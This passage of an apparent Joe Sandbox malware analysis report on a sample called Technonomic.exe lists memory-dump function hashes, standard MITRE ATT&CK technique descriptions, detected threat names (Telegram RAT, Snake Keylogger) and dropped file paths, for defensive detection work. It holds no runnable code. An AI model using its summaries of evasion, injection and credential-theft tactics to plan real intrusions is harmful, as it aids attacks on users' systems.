Instruction Fuzzy Hash: EF517074E01308CFCB08DFA9D59499DBBF2FF89310B208169E815AB364DB75A942CF50

Function 032A5658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c261eeed60ef7273f796eb05fab7df9919944cd8b05a71bcf5247d7182ebf2fb
Instruction ID: bf03147d61794e5de596992326e3fbffb51ba3c3068bb75a3f42f43fcb784fe0
Opcode Fuzzy Hash: c261eeed60ef7273f796eb05fab7df9919944cd8b05a71bcf5247d7182ebf2fb
Instruction Fuzzy Hash: 64319E7561060ADFCB01DF68C844AAF7BB6EF49311F344054F9569B260CB79DDA1CBA0

Function 032A2790 Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a633854e30c507939c8e946787055f42cb17096044dc30e3d35198b180dba596
Instruction ID: 6a04ae6f08d445a898b05cce4b56a2ef56ea9828284059c6770665053928223d
Opcode Fuzzy Hash: a633854e30c507939c8e946787055f42cb17096044dc30e3d35198b180dba596
Instruction Fuzzy Hash: F4314874D2575ECFCB04EFB8D844AEEBBF5BB4A311F14456AC415A7210EB344A81CBA1

Function 032A28F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f047a765ee2fc8f3d385898884e954c66fad61bb371bd7f2fbd11bcfa2e67c8
Instruction ID: 225c1bc75bae690abcf080bc5b2901eab0fe448d0dbb7d55b5c26c87092cebdb
Opcode Fuzzy Hash: 9f047a765ee2fc8f3d385898884e954c66fad61bb371bd7f2fbd11bcfa2e67c8
Instruction Fuzzy Hash: 1B218335A0060ADFCF14DF7CC4409AE7BB5EB99B60B248459D81997340DB30EE46CBE0

Function 032AF618 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27796b1d1b47b36e5b1257e32d7635840f4e3105c2179201d54b515ffdfe3d0c
Instruction ID: 7309d5f0f0757603c9a302172556c7c89e1836de23f46cf64b7b470e7a644782
Opcode Fuzzy Hash: 27796b1d1b47b36e5b1257e32d7635840f4e3105c2179201d54b515ffdfe3d0c
Instruction Fuzzy Hash: DC21F7B0804349DFD701EFA9EA4479DBBF2FF42320F048296C1649B265E7789945CB91

Function 032A6300 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0741d7723828c8323109f0b1e64dff2d99535362b4ad7273fa584cd9a45ff384
Instruction ID: 5c075a140a63113827ab2efbb9159e86259fcc0daa2516989731eb8eef0e4637
Opcode Fuzzy Hash: 0741d7723828c8323109f0b1e64dff2d99535362b4ad7273fa584cd9a45ff384
Instruction Fuzzy Hash: 6411A535711A169FC715DA2EC45493EB7A6EFC5B5132C40A8E907CB760CF35DC828B90

Function 032A27F0 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9249e0c8bace27ed104b928140a0782d33b445a24e16989eeda3ff987e3e7802
Instruction ID: b73f3967ef76fbe3cb60d155e658673666ba487a096f7ab86dcbc4f9262dfd8c
Opcode Fuzzy Hash: 9249e0c8bace27ed104b928140a0782d33b445a24e16989eeda3ff987e3e7802
Instruction Fuzzy Hash: A221EF74D1160ACFCB00EFA9D945AEEBFF4BF4A310F14426AD815B3210EB345A85CBA1

Function 032AF640 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62410cea21f55cb67b5afe7f52e8e9f796168c173a9e3cee9b404dc151897cdf
Instruction ID: 35d39743a1db99d6122e1dedcb52c7fd68fbcbf4153417c6e163267d9fa34eb9
Opcode Fuzzy Hash: 62410cea21f55cb67b5afe7f52e8e9f796168c173a9e3cee9b404dc151897cdf
Instruction Fuzzy Hash: 392193B0904249DFDB01DFA9E98078EBBF2FF41324F0481A9C1549B265D7789A458B81

Function 032A5E72 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c75f700e41127936747a4773129ac7a0d304ebb0f6dcabcf767d11a88d25858
Instruction ID: 683d183ae57e96068e7fbae09537b56b7d4f25af307cd8979bdba393807d388c
Opcode Fuzzy Hash: 3c75f700e41127936747a4773129ac7a0d304ebb0f6dcabcf767d11a88d25858
Instruction Fuzzy Hash: 88012632B6040A5FCB01DE5C99009AB7BABEBC6361F384025F954C6151DB71C85297D8

Function 032A5E98 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63d3479af93e2810ec54ad102c3e5b322c23597c282972035ab4ac17ea3e5915
Instruction ID: 633213d384e46fabaf21788e4b47561394f953ee07ed7cf7a1ca59ebed962fc1
Opcode Fuzzy Hash: 63d3479af93e2810ec54ad102c3e5b322c23597c282972035ab4ac17ea3e5915
Instruction Fuzzy Hash: 5D01FE32F103156FCB05DE5C88045AF7BA7DBCA350F288016F945CB254DE718D5597D4

Function 032AF650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d61a9cb8af63fbb8c51deef191a0a445e707a5c74794afc404dede0d5865de1
Instruction ID: c38ffd1bdb2084c167ce8bb5ff0ab44e5287dbbf0d06c9b4d7e0246edcd9b0b2
Opcode Fuzzy Hash: 3d61a9cb8af63fbb8c51deef191a0a445e707a5c74794afc404dede0d5865de1
Instruction Fuzzy Hash: C6112CB0D00209EFDB00EFA9D980A9EBBF2FF44310F108565C1189B254EB745A458F91

Function 032AE8E8 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e67527e31adfde8473f930a3461aec9d2fa4e8ae0ebeae6d530b409701b4a8a
Instruction ID: f656fc25f1f3a4f915ce91395ae17ab42028b7677f136126d830187c30dfb018
Opcode Fuzzy Hash: 5e67527e31adfde8473f930a3461aec9d2fa4e8ae0ebeae6d530b409701b4a8a
Instruction Fuzzy Hash: 6E119A75D0430ADFCB40DFA8E848AAEBBB2FB4A310F10456AD561B3391D7389A55CF90

Function 032A28AB Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cb1f12162fd83f8ab915ccc23fa61712bfa0f8738fac4c1a478e93fb5bc2ba6
Instruction ID: c58ef3e09deec405efb3364b7944a90d475a34aac8159ae054a1d5fc0f5d76b5
Opcode Fuzzy Hash: 1cb1f12162fd83f8ab915ccc23fa61712bfa0f8738fac4c1a478e93fb5bc2ba6
Instruction Fuzzy Hash: 2EE0C232D2022A578B00EAA5DC004DFBB38EE82720B904222D42133100EB302659C2B0

Function 032A28B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e755788128ddbf23573696b6bb852139286c3013778aeb169b7ce493cab11939
Instruction ID: c8304c53151226d54f0c9d3a3f5e6c8c03e030300ef8879c3aee508963828839
Opcode Fuzzy Hash: e755788128ddbf23573696b6bb852139286c3013778aeb169b7ce493cab11939
Instruction Fuzzy Hash: 3BD05B31D2022A57CB00E7A5DC044DFFB38EFD6721B514666D55437140FB702659C6F1

Function 032AAFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 846d2e6025658a79b55ad7c77e185bdabdda5e4684d89ee7e11b2c9aafe546e6
Instruction ID: a50d6b7ef4ddd45ea4551adc4a0ab90f16884a905777958b4a5036099a7e0546
Opcode Fuzzy Hash: 846d2e6025658a79b55ad7c77e185bdabdda5e4684d89ee7e11b2c9aafe546e6
Instruction Fuzzy Hash: 72D0673BB100099FCB149F98E840DDDF776FB98221B548116E915A3260C6319925DB54

Function 032A6748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 658df70de19f685487cf2a406f1bb49bbf7399baa78ab8f04a37e09a726c0a75
Instruction ID: 07bc77987b8085685cba2c6a518a26b0ec151f4a68558e4014b3301d71636637
Opcode Fuzzy Hash: 658df70de19f685487cf2a406f1bb49bbf7399baa78ab8f04a37e09a726c0a75
Instruction Fuzzy Hash: 60C0803441430D4BD601F771EC45D95335FAAC0520754851093074F65EDFBC5CC54F95

Non-executed Functions

Function 032AF130 Relevance: 1.6, Strings: 1, Instructions: 336COMMON

Download Yara Rule

Strings

r, xrefs: 032AF2C4

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID: r
API String ID: 0-1812594589
Opcode ID: 6ab440fd31f20533c00bddee359bcdfd6ad795677b71547b6cc60379c4fc557c
Instruction ID: d06e1d2ba05fc55f1495cb5c1e0fbca915756ebb18335450a98423a9ee78332e
Opcode Fuzzy Hash: 6ab440fd31f20533c00bddee359bcdfd6ad795677b71547b6cc60379c4fc557c
Instruction Fuzzy Hash: D6B1B036C19B84EFD711EFBCEE487ADFBB5AB46300F188196C4046B191C7BA4885CB95

Function 032AF961 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd81064cc19e09f6a271b1b055406b726eb18187022e9cf59dcd56b3f0b963c7
Instruction ID: 0f5edcd05f62026755715531123328f60bf8e530e4a04dbab85a91bd3bb61a26
Opcode Fuzzy Hash: cd81064cc19e09f6a271b1b055406b726eb18187022e9cf59dcd56b3f0b963c7
Instruction Fuzzy Hash: A8C1C275E10218CFEB15DFA9C994B9DBBB2BF89300F2080A9D409AB364DB355E85CF50

Function 032AF4AC Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2598620882.00000000032A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_32a0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7207b31048eea82f7075768042703e0905b32851fb485678d0be64ef007bc76d
Instruction ID: 301941ae53971e5d8b9fa66fec3440bb647896416da539258ac111ae5a72e06d
Opcode Fuzzy Hash: 7207b31048eea82f7075768042703e0905b32851fb485678d0be64ef007bc76d
Instruction Fuzzy Hash: F3511274D24A09DFDB00DFA8DA88BADBBB2BB49310F248159C515AB284C7799881CF50

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Technonomic.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Telegram RAT

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4d5ir0sv.cbg.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bl1qt1yp.eo0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e51s02uw.n41.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hkoccn4n.udy.psm1

C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll

C:\Users\user\AppData\Local\Temp\nst22FC.tmp

C:\Users\user\AppData\Local\magmaet\clenched\Frontoparietal.ruf

C:\Users\user\AppData\Local\magmaet\clenched\Ifrt.Syd

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\Technonomic.exe:Zone.Identifier

C:\Users\user\AppData\Local\magmaet\clenched\Nonadoptable\forsmgt.txt

Windows Analysis Report
Technonomic.exe

Function 004033B6 Relevance: 91.4, APIs: 32, Strings: 20, Instructions: 401
stringfilecomCOMMON

Function 00405421 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 004061A5 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 207
stringCOMMON

Function 00405974 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00403D6F Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345
windowstringCOMMON

Function 004039CC Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402E41 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401767 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre